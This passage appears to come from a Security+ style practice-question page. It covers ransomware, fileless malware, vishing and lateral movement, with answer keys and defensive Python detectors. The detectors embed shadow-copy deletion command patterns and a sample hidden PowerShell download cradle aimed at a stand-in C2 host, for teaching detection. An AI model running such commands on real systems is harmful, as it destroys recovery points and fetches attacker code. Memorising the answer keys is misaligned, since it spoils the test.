Option A is wrong because immediately accepting risk without verifying reachability or applying a compensating control is premature; the vulnerability may still be exploitable if the module can be enabled remotely or if the package has other attack surfaces. Option C is wrong because marking the finding as a false positive is incorrect: the vulnerability is real (the package is installed and vulnerable) even if the optional module is disabled; a false positive would mean the scanner reported a vulnerability that does not exist, which is not the case here. Option D is wrong because pulling a production server and rebuilding it is a disproportionate response to a finding whose exploitability has not yet been confirmed; it causes the very downtime the scenario is trying to manage without first establishing that the risk warrants it.

177
MCQmedium

A workstation starts failing security checks. The antivirus service no longer appears in the running process list, a known driver's hash does not match the vendor's value, and a task manager view shows fewer processes than expected. The user also reports that local admin tools behave inconsistently. What type of malware is most likely present?

A.Spyware
B.Rootkit
C.Trojan
D.Logic bomb
AnswerB

A rootkit is designed to hide malicious activity and maintain stealth by manipulating operating system internals, drivers, or kernel components. Missing processes and hash mismatches support that conclusion.

Why this answer

The symptoms (an antivirus service missing from the process list, a known driver whose hash no longer matches the vendor's value, fewer processes in Task Manager than expected, and inconsistent admin tool behavior) are classic indicators of a rootkit. Rootkits operate at kernel or driver level, hooking or patching the code that enumerates processes, files, and registry keys so that standard tools cannot see the malware; a driver that fails its hash check has been modified or replaced, which is one way a kernel-mode rootkit gets loaded. Because the operating system's own view is no longer trustworthy, confirmation should come from outside it, for example a cross-view comparison against a memory image or an offline scan of the disk from clean boot media.

Exam trap

The trap here is that candidates often confuse a rootkit with a trojan because both can be stealthy, but the specific clues—driver hash mismatch and hidden processes—point to kernel-level manipulation unique to rootkits, not the user-level deception of a trojan.

How to eliminate wrong answers

Option A is wrong because spyware typically focuses on data theft and monitoring (e.g., keylogging, screen captures) and does not hide its processes or alter driver hashes at the kernel level. Option C is wrong because a trojan masquerades as legitimate software to gain initial access but does not inherently possess the capability to hide processes or modify driver hashes post-infection. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event) and does not actively hide processes or alter system drivers.

178
MCQhard

Based on the exhibit, what is the BEST immediate containment action? The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.

A.Immediately isolate the endpoint from the network using EDR containment or switch quarantine.
B.Power off the workstation immediately to prevent any further file changes.
C.Uninstall Microsoft Office so the malicious spreadsheet cannot launch again.
D.Block the destination IP address at the firewall and wait for the user to log off.
AnswerA

The device is actively exhibiting ransomware-like behavior, and isolation stops lateral spread and additional command-and-control traffic while preserving the powered-on system for later review.

Why this answer

Option A is correct because the immediate priority is to stop the active malicious activity (file renaming, system slowdown) from spreading by severing the workstation's network connectivity. EDR network containment (a host-level filter that allows only the EDR management channel) or a switch-port quarantine VLAN cuts the endpoint off from file shares, other hosts, and any command-and-control server, while preserving volatile memory for forensic analysis. This is faster and more controlled than powering off, which destroys that evidence; the local encryption process still has to be stopped afterward, but isolating first limits the damage to one host.

Exam trap

CompTIA often tests the distinction between containment (stopping the spread) and eradication (removing the threat), tempting candidates to choose power-off or uninstall actions that destroy evidence or fail to stop active malicious processes.

How to eliminate wrong answers

Option B is wrong because powering off the workstation destroys volatile evidence (running processes, network connections, memory-resident malware, and possibly encryption keys) and, unlike isolation, gives responders no chance to observe or stop the process; it is a fallback for when isolation is not possible. Option C is wrong because uninstalling Microsoft Office is a remediation step, not an immediate containment action; it does not stop the ongoing malicious activity and may take too long while the attacker continues to rename files. Option D is wrong because blocking the destination IP at the firewall does not stop the local malicious process already running on the workstation, and waiting for the user to log off allows further damage; containment must be applied directly to the endpoint.

179
MCQmedium

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

A.Pay the ransom immediately to restore access quickly.
B.Isolate the affected systems from the network and preserve evidence.
C.Reimage the server immediately without documenting the event.
D.Disable antivirus alerts so staff can work without distractions.
AnswerB

Isolation is the first priority because it helps stop the spread of ransomware and prevents additional encryption or lateral movement. Preserving evidence at the same time supports later incident response, forensics, and potential legal or insurance needs. The organization can then assess the scope, validate backups, and begin containment and recovery in a controlled way. Immediate disconnection from the network is usually more valuable than attempting remediation on a live, actively infected host.

Why this answer

Isolating the affected systems from the network and preserving evidence is the correct first step because it prevents the ransomware from spreading to other systems via SMB or other network protocols, and it preserves the forensic artifacts (e.g., the ransom note, encrypted files, and Volume Shadow Copy Service logs) needed for incident response and potential decryption. Disabling VSS is a common ransomware tactic to prevent file recovery, so immediate containment is critical before any remediation.

Exam trap

The trap here is that candidates may confuse 'immediate remediation' (e.g., reimaging) with 'first response' (containment and evidence preservation), or they may incorrectly assume paying the ransom is a viable technical solution, when in fact payment guarantees nothing and law enforcement guidance (for example from CISA and the FBI) discourages it; incident handling guidance such as NIST SP 800-61 puts containment and evidence preservation ahead of any recovery decision.

How to eliminate wrong answers

Option A is wrong because paying the ransom does not guarantee decryption (attackers may not provide the key), it funds further criminal activity, and it violates most organizational security policies and legal guidelines. Option C is wrong because reimaging the server immediately destroys all forensic evidence (e.g., memory dumps, logs, encrypted file samples) that could be used for attribution, decryption research, or legal action, and it bypasses the necessary containment step to prevent lateral movement. Option D is wrong because silencing antivirus alerts blinds the team to how far the infection has spread and does nothing to contain it.
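The two clues in this question, shadow copies being disabled and a burst of files gaining a new extension, are exactly what an endpoint detection rule looks for. The following Python is an added example, not code from the original page: it runs over constructed process-creation and file-rename events (Sysmon-style fields, invented paths, process IDs and timings) and reports shadow-copy destruction commands and any process that renames many files to one new extension within a short window.

```python
import re
from collections import defaultdict

# Commands ransomware commonly runs to destroy recovery points (matched case-insensitively).
SHADOW_COPY_PATTERNS = [
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"bcdedit(?:\.exe)?\s.*recoveryenabled\s+no", re.I),
]

# Constructed endpoint telemetry, not a real log. "t" is seconds since capture start.
SAMPLE_EVENTS = [
    {"t": 10, "type": "process", "pid": 3120, "image": "backup.exe",
     "cmdline": "backup.exe --rotate"},
    # a benign admin query that must not be flagged
    {"t": 20, "type": "process", "pid": 900, "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    # the payload kills recovery points, then mass-renames documents
    {"t": 98, "type": "process", "pid": 4412, "image": "cmd.exe",
     "cmdline": "cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"},
]
SAMPLE_EVENTS += [
    {"t": 100 + i * 1.5, "type": "rename", "pid": 4412,
     "old": f"C:\\Share\\Finance\\report{i}.docx",
     "new": f"C:\\Share\\Finance\\report{i}.docx.locked"}
    for i in range(30)
]
SAMPLE_EVENTS += [   # backup.exe renaming a handful of files is normal
    {"t": 11 + i, "type": "rename", "pid": 3120,
     "old": f"C:\\Backups\\day{i}.zip", "new": f"C:\\Backups\\day{i}.zip.bak"}
    for i in range(5)
]


def detect_ransomware_indicators(events, burst_count=20, window_s=60):
    """Return findings for shadow-copy deletion and for any process that renames
    burst_count or more files to one new extension within window_s seconds."""
    findings = []
    renames = defaultdict(lambda: defaultdict(list))  # pid -> new extension -> [times]

    for e in sorted(events, key=lambda ev: ev["t"]):
        if e["type"] == "process":
            if any(p.search(e["cmdline"]) for p in SHADOW_COPY_PATTERNS):
                findings.append({"kind": "shadow_copy_deletion", "pid": e["pid"],
                                 "cmdline": e["cmdline"]})
        elif e["type"] == "rename":
            ext = e["new"].rsplit(".", 1)[-1].lower()
            renames[e["pid"]][ext].append(e["t"])

    for pid, by_ext in renames.items():
        for ext, times in by_ext.items():
            start = 0                      # sliding window over time-ordered renames
            for end in range(len(times)):
                while times[end] - times[start] > window_s:
                    start += 1
                if end - start + 1 >= burst_count:
                    findings.append({"kind": "rename_burst", "pid": pid,
                                     "extension": ext, "count": len(times)})
                    break
    return findings
```

The shadow-copy rule fires on the command line regardless of which parent launched it, which matters because ransomware usually runs `vssadmin` through `cmd.exe` or PowerShell rather than directly. The rename threshold and window are tuning knobs: a backup or archiving job that renames files at a steady rate can trip them, so in practice the rule is scoped to document extensions and to processes that are not on an allowlist.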

180
MCQmedium

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

A.Fileless malware that relies on scripting and memory-resident execution.
B.A macro virus that only runs when a document is opened.
C.A boot sector virus that persists by altering startup code.
D.A logic bomb that activates only when a specific date or event is reached.
AnswerA

This pattern matches malware that abuses trusted processes and scripts instead of dropping a traditional executable file. Browser-to-PowerShell chaining, encoded commands, and memory-resident activity are common indicators. The lack of a new file on disk does not mean the endpoint is clean; it often means the attacker is trying to evade traditional file-based detection.

Why this answer

Option A is correct because the described behavior—a legitimate browser process spawning PowerShell with an encoded command, executing in memory without writing a new executable to disk, and making an outbound connection to a newly registered domain—is the classic hallmark of fileless malware. Fileless malware leverages built-in scripting engines (like PowerShell) and runs entirely in memory, avoiding traditional disk-based detection by antivirus and forensic tools.

Exam trap

The trap here is that candidates may assume any malware that doesn't write a file is a 'macro virus' or 'boot sector virus,' but the key differentiator is the use of a scripting engine (PowerShell) spawned by a legitimate process, combined with memory-only execution and an immediate C2 connection, which uniquely defines fileless malware.

How to eliminate wrong answers

Option B is wrong because a macro virus requires a document to be opened and typically writes a macro to the document or template, whereas the scenario involves a browser process spawning PowerShell with an encoded command and no document interaction. Option C is wrong because a boot sector virus alters the Master Boot Record (MBR) or Volume Boot Record (VBR) to persist on disk at system startup, but the scenario shows no disk write and execution is memory-resident via a scripting engine. Option D is wrong because a logic bomb triggers only when a specific condition (date, event, or user action) is met, but the scenario describes an immediate outbound connection following the PowerShell execution, with no mention of a delayed or conditional trigger.
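Triage of this pattern comes down to two checks: who spawned PowerShell, and what the encoded command actually says. The Python below is an added example, not code from the original page. It decodes `-EncodedCommand` arguments the way PowerShell does (base64 over UTF-16LE) and flags PowerShell launched by a browser or carrying an encoded payload, over constructed process-creation events; the browser list, the accepted short forms of the switch, the suspicious-string patterns and the sample command are assumptions for the demo.

```python
import base64
import binascii
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# The -EncodedCommand switch and the short forms PowerShell accepts (assumed common set).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS = [
    ("invoke_expression", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    ("download_cradle", re.compile(
        r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b")),
    ("stealth_flags", re.compile(r"(?i)-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-noni\b")),
]


def encode_powershell(script):
    """Produce an -EncodedCommand argument the way attackers do: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


# Constructed process-creation events (Sysmon-style fields), not a real log.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example-c2.invalid/a')")},
    {"parent": "chrome.exe", "image": "chrome.exe", "cmdline": "chrome.exe --type=renderer"},
]


def triage_process_events(events):
    """Flag PowerShell launched by a browser and/or carrying an encoded command,
    decoding the command so the analyst sees what actually ran."""
    findings = []
    for e in events:
        if e["image"].lower() not in SHELLS:
            continue
        reasons = []
        if e["parent"].lower() in BROWSERS:
            reasons.append("spawned_by_browser")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded is not None:
            reasons.append("encoded_command")
        if not reasons:
            continue
        # Search the visible switches plus the decoded script, not the base64 blob itself.
        text = ENC_FLAG.sub(" ", e["cmdline"]) + "\n" + (decoded or "")
        hits = [name for name, pat in SUSPICIOUS if pat.search(text)]
        findings.append({"parent": e["parent"], "cmdline": e["cmdline"],
                         "decoded": decoded, "reasons": reasons, "hits": hits})
    return findings
```

The parent-child relationship is the higher-confidence signal: a scheduled inventory script launched from `explorer.exe` is left alone even though it is PowerShell, while a browser spawning a hidden, no-profile PowerShell with a download cradle in the decoded text is the fileless chain the question describes. On a real fleet, PowerShell script-block logging (event 4104) records the decoded script server-side, so the decode step here mainly matters when only the process command line is available.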

181
MCQeasy

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

A.Keep the laptop online so security tools can continue collecting data
B.Disconnect the laptop from the network and begin endpoint isolation
C.Immediately reimage the laptop before preserving any evidence
D.Ask the user to uninstall the browser and reinstall it manually
AnswerB

Network isolation stops the suspected malicious software from communicating outward or spreading while analysts investigate the device.

Why this answer

The best immediate action is to isolate the laptop from the network. The symptoms suggest malicious or unwanted software may be communicating with outside servers or affecting the browser. Isolation limits further damage, prevents possible spread, and gives responders time to inspect the system safely. This is a standard first containment step when a workstation appears compromised but is still active.

Why others are wrong: Keeping the laptop online risks continued malicious activity. Reimaging too early can destroy evidence needed for root-cause analysis. Simply reinstalling the browser may remove a symptom, but it does not address the possibility of a broader endpoint compromise.

182
MCQmedium

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

A.Vishing, because the attacker is using a voice call to manipulate the target in real time.
B.Smishing, because the attacker requested a code and mentioned a financial problem.
C.Baiting, because the caller offered to fix the payment issue for the employee.
D.Tailgating, because the attacker used a trusted identity to gain access.
AnswerA

Vishing is voice-based phishing. The attacker used a phone call, gained trust with specific details, and pressured the employee to reveal an MFA code. That real-time conversation and the request for a secret value are classic indicators of a voice social engineering attempt.

Why this answer

The attack is vishing (voice phishing) because the attacker uses a telephone call to socially engineer the target into divulging a one-time MFA code. The real-time voice interaction and the specific request for an authentication code are hallmarks of vishing, which exploits human trust rather than technical vulnerabilities.

Exam trap

The trap here is confusing the delivery method (voice vs. text) and focusing on the content (request for a code) rather than the channel, leading candidates to incorrectly choose smishing when the attack is clearly voice-based.

How to eliminate wrong answers

Option B is wrong because smishing uses SMS text messages, not voice calls; the attacker here called the clerk, so the medium is voice, not text. Option C is wrong because baiting involves offering something enticing (e.g., a free USB drive) to lure the victim into an action, not a real-time request for a code over the phone. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area; this scenario involves no physical access, only a phone call.

183
MCQmedium

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

A.Worm behavior, because the malware is automatically spreading across the network.
B.Fileless attack, because the malicious activity is using legitimate tools and memory rather than a dropped payload.
C.Rootkit behavior, because the attacker is hiding from the operating system at a low level.
D.Spyware, because the malware is using HTTPS traffic to contact an external domain.
AnswerB

The alert shows encoded PowerShell, no new file on disk, and persistence through a registry run key. That pattern strongly suggests a fileless attack, where attackers abuse trusted system tools and memory-based execution to avoid traditional file detection.

Why this answer

The EDR alert describes a classic fileless attack: PowerShell.exe executes an encoded command in memory, no new executable is written to disk, and persistence is achieved via a registry run key. The outbound HTTPS traffic to a rare domain indicates command-and-control (C2) communication. Fileless malware leverages legitimate system tools (like PowerShell) and runs entirely in memory, bypassing traditional file-based detection.

Exam trap

The trap here is that candidates see 'HTTPS traffic to an external domain' and jump to spyware (Option D), but the question's emphasis on 'no new executable written to disk' and 'encoded command' points directly to fileless attack, not data exfiltration as the primary behavior.

How to eliminate wrong answers

Option A is wrong because worm behavior requires self-propagating across a network (e.g., exploiting vulnerabilities or copying itself), which is not indicated by a single PowerShell launch and registry persistence. Option C is wrong because rootkit behavior involves hiding from the OS at a low level (e.g., kernel-mode hooks or driver manipulation), not simply using PowerShell and registry keys. Option D is wrong because spyware typically exfiltrates data via HTTP/HTTPS, but the core behavior here—encoded command execution in memory with no file dropped—is the hallmark of a fileless attack, not spyware.

184
MCQeasy

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

A.DNS poisoning
B.Denial of service
C.Replay attack
D.Port scanning
AnswerA

DNS poisoning changes name-resolution information so users are sent to the wrong IP address. If the cache points a real name to a fake server, DNS poisoning is the most likely cause.

Why this answer

DNS poisoning (also known as DNS cache poisoning) occurs when an attacker inserts forged DNS resource records into the local DNS cache, causing subsequent queries for a legitimate domain to resolve to an attacker-controlled IP address. In this scenario, users type the correct website name, but because the local DNS cache has been altered, their browsers are redirected to a fake server. This directly matches the description of DNS poisoning.

Exam trap

The trap here is that candidates may confuse DNS poisoning with a man-in-the-middle attack or think that altering the local hosts file is the same mechanism, but the question specifically states the local DNS cache is altered, which is the hallmark of DNS cache poisoning.

How to eliminate wrong answers

Option B (Denial of service) is wrong because a denial-of-service attack aims to make a service unavailable by overwhelming it with traffic or exploiting vulnerabilities, not by redirecting users to a fake server after altering DNS cache. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid network transmissions (e.g., authentication tokens) to impersonate a user or gain unauthorized access, not manipulating DNS resolution. Option D (Port scanning) is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a target system, not an attack that alters DNS cache to redirect users.

185
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

A.Ignore the finding because the scanner is clearly wrong
B.Create a time-limited exception and apply compensating controls until patching is possible
C.Reinstall the disabled plugin so the scanner output matches the running configuration
D.Expose the server to the internet for faster monitoring and patch testing
AnswerB

A temporary exception with compensating controls balances business constraints and security while the team schedules a proper fix.

Why this answer

Option B is correct because the vulnerability exists in a disabled plugin, meaning the attack surface is reduced but not eliminated; residual risk remains if the plugin is re-enabled or if other dependencies are affected. Creating a time-limited exception with compensating controls (e.g., firewall rules, file permissions, SELinux policies) allows the organization to formally accept the risk until the vendor patch is applied, which aligns with standard vulnerability management processes.

Exam trap

The trap here is that candidates assume a disabled plugin means zero risk, but the exam expects you to recognize that the package is still installed and could be exploited if re-enabled, so formal risk acceptance with compensating controls is required rather than ignoring or re-enabling the plugin.

How to eliminate wrong answers

Option A is wrong because the scanner is not 'clearly wrong' — it correctly identified that the vulnerable package is installed, even though the vulnerable code path is disabled; ignoring the finding would bypass proper risk acceptance and could lead to compliance issues. Option C is wrong because reinstalling the disabled plugin would reintroduce the vulnerable code path, increasing the attack surface and contradicting the goal of reducing risk; the scanner output already reflects the installed package, and the administrator should not alter the configuration to match a false sense of security.

186
MCQmedium

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

A.Distributed denial-of-service activity against the internal network.
B.Lateral movement using compromised credentials to pivot across the environment.
C.Port scanning from an external attacker trying to enumerate exposed services.
D.DNS tunneling used to bypass content filtering and exfiltrate data.
AnswerB

The pattern of SMB, WinRM, Kerberos, and admin-share activity strongly suggests an attacker is using one compromised workstation to move laterally and reach additional systems. That behavior matches post-compromise pivoting, often with stolen credentials or remote execution tooling. The invoice spreadsheet is likely the initial infection vector.

Why this answer

The observed behavior—a single workstation initiating SMB and WinRM sessions to 25 internal servers in rapid succession, followed by a spike in Kerberos authentication requests and attempts to access admin shares—is a classic indicator of lateral movement using compromised credentials. The attacker likely obtained the user's credentials (e.g., via phishing in the invoice spreadsheet) and is using them to authenticate to multiple servers via WinRM for remote command execution and SMB for file access, with the Kerberos spike reflecting TGT/TGS requests as they pivot across the environment to escalate privileges or deploy ransomware.

Exam trap

The trap here is that candidates may mistake the Kerberos spike for a Kerberos-based attack (e.g., Kerberoasting) rather than recognizing it as a natural byproduct of lateral movement, where each new server connection triggers a TGS request, and the admin share access confirms the attacker is using compromised credentials to pivot, not just enumerate services.

How to eliminate wrong answers

Option A is wrong because DDoS activity would involve flooding the network with traffic from multiple sources, not a single workstation initiating authenticated sessions to internal servers; the pattern here is targeted and interactive, not volumetric. Option C is wrong because port scanning from an external attacker would show a broad range of IPs and ports being probed, not authenticated SMB/WinRM sessions followed by Kerberos requests; the use of valid credentials and admin share access indicates the attacker is already inside and moving laterally. Option D is wrong because DNS tunneling would manifest as unusual DNS query patterns (e.g., large or encoded queries) to exfiltrate data, not as SMB/WinRM sessions and Kerberos authentication spikes; the observed activity is about internal authentication and resource access, not data exfiltration via DNS.
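The fan-out pattern this question describes can be turned into a simple detection over flow records. This is an added example, not part of the original question bank: the flow lines, hosts and thresholds are constructed here, and the 12-minute window and 25-server count mirror the scenario.

```python
"""Flag one internal source opening SMB/WinRM sessions to many distinct hosts in a short window.

Added example; the flow records, addresses and threshold below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# Ports a workstation normally has little reason to fan out on (SMB and WinRM)
ADMIN_PORTS = {445: "SMB", 5985: "WinRM-HTTP", 5986: "WinRM-HTTPS"}


class Flow(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Parse a constructed CSV-style record: '2024-05-06T09:00:00,10.1.1.5,10.1.2.10,445'."""
    ts, src, dst, dport = line.strip().split(",")
    return Flow(datetime.fromisoformat(ts), src, dst, int(dport))


def detect_fanout(flows: List[Flow],
                  window: timedelta = timedelta(minutes=12),
                  threshold: int = 10) -> Dict[str, int]:
    """Return {src: peak_distinct_destinations} for sources whose admin-port fan-out
    reaches `threshold` distinct hosts inside any `window`-long sliding window."""
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        if f.dport in ADMIN_PORTS:
            by_src[f.src].append(f)

    hits: Dict[str, int] = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        peak, left = 0, 0
        for right in range(len(fl)):
            # Slide the left edge until the window spans at most `window`
            while fl[right].ts - fl[left].ts > window:
                left += 1
            distinct = len({f.dst for f in fl[left:right + 1]})
            peak = max(peak, distinct)
        if peak >= threshold:
            hits[src] = peak
    return hits


def detect_from_lines(lines: List[str], **kwargs) -> Dict[str, int]:
    """Convenience wrapper: parse raw records, then run the fan-out check."""
    return detect_fanout([parse_flow(l) for l in lines], **kwargs)


def _make_sample() -> List[str]:
    """Constructed flow log: one suspicious workstation plus two benign admin hosts."""
    base = datetime(2024, 5, 6, 9, 0, 0)
    lines = []
    # Workstation 10.1.1.5 reaches 25 servers in 12 minutes, alternating SMB and WinRM
    for i in range(25):
        port = 445 if i % 2 == 0 else 5985
        t = base + timedelta(seconds=30 * i)
        lines.append(f"{t.isoformat()},10.1.1.5,10.1.2.{i + 1},{port}")
    # Backup host 10.1.1.7 touches 3 servers: normal
    for i in range(3):
        t = base + timedelta(minutes=i)
        lines.append(f"{t.isoformat()},10.1.1.7,10.1.2.{i + 1},445")
    # Patching host 10.1.1.9 touches 12 servers but ten minutes apart: slow, not a fan-out
    for i in range(12):
        t = base + timedelta(minutes=10 * i)
        lines.append(f"{t.isoformat()},10.1.1.9,10.1.2.{i + 1},5986")
    # A DNS lookup from the workstation; not an admin port, so ignored by the check
    lines.append(f"{base.isoformat()},10.1.1.5,10.1.0.53,53")
    return lines


SAMPLE_FLOW_LINES = _make_sample()

if __name__ == "__main__":
    for src, peak in detect_from_lines(SAMPLE_FLOW_LINES).items():
        print(f"possible lateral movement: {src} reached {peak} hosts on admin ports")
```

The slow patching host shows why the window matters: the same destination count spread over two hours never triggers the rule.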

187
MCQmedium

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

A.Move the console to a separate management network and restrict access to admin hosts only.
B.Increase the number of shared passwords so administrators can log in faster.
C.Leave the console exposed but shorten the password expiration period.
D.Disable logging so failed attempts do not generate noise.
AnswerA

Administrative interfaces should not be reachable from ordinary user endpoints. Moving the console to a dedicated management network and allowing access only from approved admin systems reduces the attack surface and limits who can even attempt to log in. That is a strong hardening control because it addresses both exposure and misuse. If a workstation should never manage servers, network-level segmentation is the right place to enforce that boundary before authentication is even attempted.

Why this answer

The administrative web console should be isolated on a separate management network (out-of-band management) with strict access control lists (ACLs) allowing only designated admin hosts. This prevents lateral movement from compromised user workstations and eliminates the attack surface exposed to all authenticated employees. Network segmentation is a fundamental defense-in-depth control for managing critical infrastructure, as it enforces the principle of least privilege at the network layer.

Exam trap

CompTIA often tests the misconception that password policies (rotation, complexity, or expiration) are sufficient hardening for exposed management interfaces, when in fact network segmentation and access control are the primary mitigations.

How to eliminate wrong answers

Option B is wrong because increasing the number of shared passwords does not address the root cause of unauthorized access; it actually weakens accountability and increases the risk of credential theft. Option C is wrong because shortening the password expiration period does not prevent an attacker from reaching the console; it only slightly reduces the window of opportunity for a compromised password, while the console remains exposed to all users. Option D is wrong because disabling logging removes visibility into security events, violating the fundamental security principle of auditability and making incident response impossible.

188
MCQmedium

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

A.Spear phishing, because the caller used specific employee details to appear credible.
B.Vishing, because the attacker is using a voice call to pressure support staff into changing access.
C.Pretexting, because the attacker is creating a false identity and believable story.
D.Baiting, because the attacker offered a tempting opportunity tied to a customer demo.
AnswerB

Vishing is voice-based social engineering, and this scenario centers on a caller using urgency and credibility to trick the help desk into resetting access and weakening MFA controls.

Why this answer

Option B is correct because vishing (voice phishing) specifically involves using a phone call to socially engineer a target into performing an action, such as resetting credentials and bypassing MFA. The attacker pressures the help desk agent by creating urgency around a customer demo, which is a classic vishing tactic to bypass security controls.

Exam trap

The trap here is that candidates confuse pretexting (the false identity) with the delivery method (vishing), but the exam expects you to identify the specific attack vector—voice call—as the defining characteristic of vishing.

How to eliminate wrong answers

Option A is wrong because spear phishing is an email-based attack that uses personalized content to trick the recipient into clicking a link or opening an attachment, not a voice call. Option C is wrong because while pretexting involves creating a false identity and story, the specific attack vector here is a voice call, making vishing the more precise classification under social engineering. Option D is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure the victim, not using a fabricated story over the phone.

189
MCQmedium

Based on the exhibit, what is the most likely issue with the software component being built?

A.Supply-chain compromise, because the dependency may have been altered before it reached the build pipeline.
B.Cross-site scripting, because the package name suggests the application handles web content.
C.Credential stuffing, because automated systems frequently reuse credentials during updates.
D.Replay attack, because the nightly pipeline used an old copy of the package request.
AnswerA

A checksum or integrity mismatch during an automated dependency pull is a strong sign that the package may have been tampered with in transit or replaced in the software supply chain. Because the build pipeline trusted the registry source automatically, the control failure is around dependency integrity and third-party trust.

Why this answer

The exhibit shows a build pipeline that fetches a dependency from a public repository. If the dependency has been tampered with before it reaches the pipeline, this is a classic supply-chain compromise. Attackers often inject malicious code into popular open-source packages, which then gets incorporated into the build, compromising the final software component.

Exam trap

The trap here is that candidates may confuse a supply-chain compromise with a web-specific attack like XSS, but the question's context of a build pipeline and dependency fetching points directly to the integrity of the software supply chain.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) is a web application vulnerability that allows injection of malicious scripts into web pages, not an issue with a build pipeline or dependency integrity. Option C is wrong because credential stuffing involves using stolen credentials to gain unauthorized access to accounts, not a problem with automated build systems reusing credentials during updates. Option D is wrong because a replay attack involves intercepting and retransmitting a valid data transmission, not using an old copy of a package request in a nightly pipeline.
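The integrity check that the explanation says was missing can be expressed as pin-then-verify: a reviewed artifact's digest is recorded once, and every later build refuses an artifact whose digest is unknown or differs. This is an added example, not the page's exhibit or any build tool's own code; the package name, artifact bytes and lockfile format are constructed.

```python
"""Pin and verify dependency digests so a build fails closed on tampering (added example).

The lockfile format 'name==version sha256=<hex>' and the sample artifacts are constructed.
"""
import hashlib
import hmac
from typing import Dict, List, Tuple

Lock = Dict[Tuple[str, str], str]  # (name, version) -> hex SHA-256 of the reviewed artifact


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def pin_dependency(lock: Lock, name: str, version: str, data: bytes) -> str:
    """Record the digest of an artifact that was reviewed once; this runs at pin time, never
    automatically on each build, otherwise the check would trust whatever the registry served."""
    digest = sha256_hex(data)
    lock[(name, version)] = digest
    return digest


def verify_dependency(lock: Lock, name: str, version: str, fetched: bytes) -> Tuple[bool, str]:
    """Fail closed: an unpinned package and a digest mismatch both block the build."""
    expected = lock.get((name, version))
    if expected is None:
        return False, f"{name}=={version} is not pinned; refusing to build"
    actual = sha256_hex(fetched)
    if not hmac.compare_digest(expected, actual):
        return False, (f"{name}=={version} digest mismatch: "
                       f"expected {expected[:12]}..., got {actual[:12]}...")
    return True, f"{name}=={version} verified"


def verify_build(lock: Lock, fetched: Dict[Tuple[str, str], bytes]) -> Tuple[bool, List[str]]:
    """Verify every fetched artifact; the build proceeds only if all of them pass."""
    messages = []
    all_ok = True
    for (name, version), data in sorted(fetched.items()):
        ok, msg = verify_dependency(lock, name, version, data)
        all_ok = all_ok and ok
        messages.append(msg)
    return all_ok, messages


def serialize_lock(lock: Lock) -> str:
    """Write the constructed lockfile format, one pinned artifact per line."""
    return "".join(f"{n}=={v} sha256={d}\n" for (n, v), d in sorted(lock.items()))


def parse_lock(text: str) -> Lock:
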